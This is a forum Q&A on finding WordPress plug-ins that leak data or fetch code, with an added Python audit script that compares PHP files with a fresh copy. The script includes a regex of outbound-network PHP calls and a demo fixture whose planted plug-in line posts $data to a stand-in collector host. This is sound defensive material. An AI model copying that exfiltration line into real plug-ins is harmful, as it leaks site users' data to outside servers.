
How to monitor a website's networking activity towards 3rd party servers?

@Turnbaugh106

Posted in: #Cms #Networking #Security

I have a Wordpress site with some plug-ins installed. I would like to check if my site tries to access any 3rd party servers in the background.

I'm aware that I can open any PHP file on my server and look for networking PHP commands. I wonder if there are any server-side security tools to monitor such activities automatically.

(My main concern is making sure that my website does not leak any data through some functions hidden in plug-ins and does not download malicious code.)

10.01% popularity Vote Up Vote Down



1 Comments


@LarsenBagley505

This is exactly why I hate wordpress and other CMSs, simply because so much can be added to it (including malicious scripts).

Now the easiest way is to check each PHP file as it applies to wordpress and look for anything unusual added to your scripts since the time the fresh installation happened. To start, download a fresh copy of wordpress, and store it in some hidden location on your server that no one can access. Then compare the file size of each PHP file in the original wordpress installation and in the current live wordpress folder. If the file size has changed, then check the contents of each file as one might be hacked.

Next, look for any PHP statements referring to opening a remote file such as file_get_contents and definitely look for any references to unwanted URLs and if they weren't in the original wordpress install, then reinstall the PHP files. Think of it like patching your computer.

According to stackoverflow.com/questions/6887338/wrapper-is-disabled-in-the-server-configuration-by-allow-url-include-0, there is a setting that is supposed to prevent some PHP functions from accessing a remote file while still allowing access to local files. I haven't tried it personally, though.

If you can't do that, then you could write a script that reads the wordpress files at regular intervals and checks them for malicious content, then have the script report any such content it finds to you.

If that doesn't work for you, then you'll have to go deep inside the system (enter the shell) and somehow execute commands to attach to the running php and/or apache (or whatever your server is) processes and see what system commands are being run.

If you want to go crazy on this last idea, then this video is for you:

10% popularity Vote Up Vote Down
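
The comparison against a fresh copy and the scan for remote-access calls described in the answer above, as an added example that is not part of the original answer. It goes one step further than the size comparison by hashing each PHP file, since an edit that keeps the size unchanged would otherwise pass; the call list, the names `audit` and `build_demo`, and the sample files are assumptions constructed for illustration.

```python
import hashlib
import re
from pathlib import Path

# Assumed (not from the answer) list of PHP/WordPress calls that can reach a remote host.
NET_CALLS = re.compile(r"\b(file_get_contents|fopen|curl_init|curl_exec|fsockopen|"
                       r"stream_socket_client|wp_remote_(?:get|post|request))\s*\(")
URL = re.compile(r"https?://[^\s'\"<>)]+", re.I)

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def audit(pristine, live):
    """Report PHP files under `live` that are new or differ from the `pristine` copy."""
    pristine, live = Path(pristine), Path(live)
    findings = {}
    for f in sorted(live.rglob("*.php")):
        ref = pristine / f.relative_to(live)
        if ref.is_file() and sha256(ref) == sha256(f):
            continue  # byte-identical to the reference copy, nothing to review
        text = f.read_text(errors="replace")
        old = ref.read_text(errors="replace") if ref.is_file() else ""
        findings[f.relative_to(live).as_posix()] = {
            "status": "modified" if ref.is_file() else "added",
            "net_calls": sorted(set(NET_CALLS.findall(text))),
            "new_urls": sorted(set(URL.findall(text)) - set(URL.findall(old))),
        }
    return findings

def build_demo(root):
    """Write a constructed pristine/live pair under `root` (sample data, not real WordPress files)."""
    files = {
        "pristine/index.php": '<?php echo "hello world"; ?>',
        "pristine/wp-load.php": "<?php require 'wp-config.php'; ?>",
        "live/index.php": '<?php echo "hello w0rld"; ?>',  # same size, different bytes
        "live/wp-load.php": "<?php require 'wp-config.php'; ?>",
        "live/wp-content/plugins/demo/demo.php":
            "<?php $r = wp_remote_post('https://collector.example/in', $data); ?>",
    }
    for rel, body in files.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    return Path(root, "pristine"), Path(root, "live")

if __name__ == "__main__":
    import json, tempfile
    with tempfile.TemporaryDirectory() as tmp:
        print(json.dumps(audit(*build_demo(tmp)), indent=2))
```

Plug-in files that are absent from the fresh copy are reported as added, together with the remote-access calls and URLs they contain, which is the list to review by hand.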

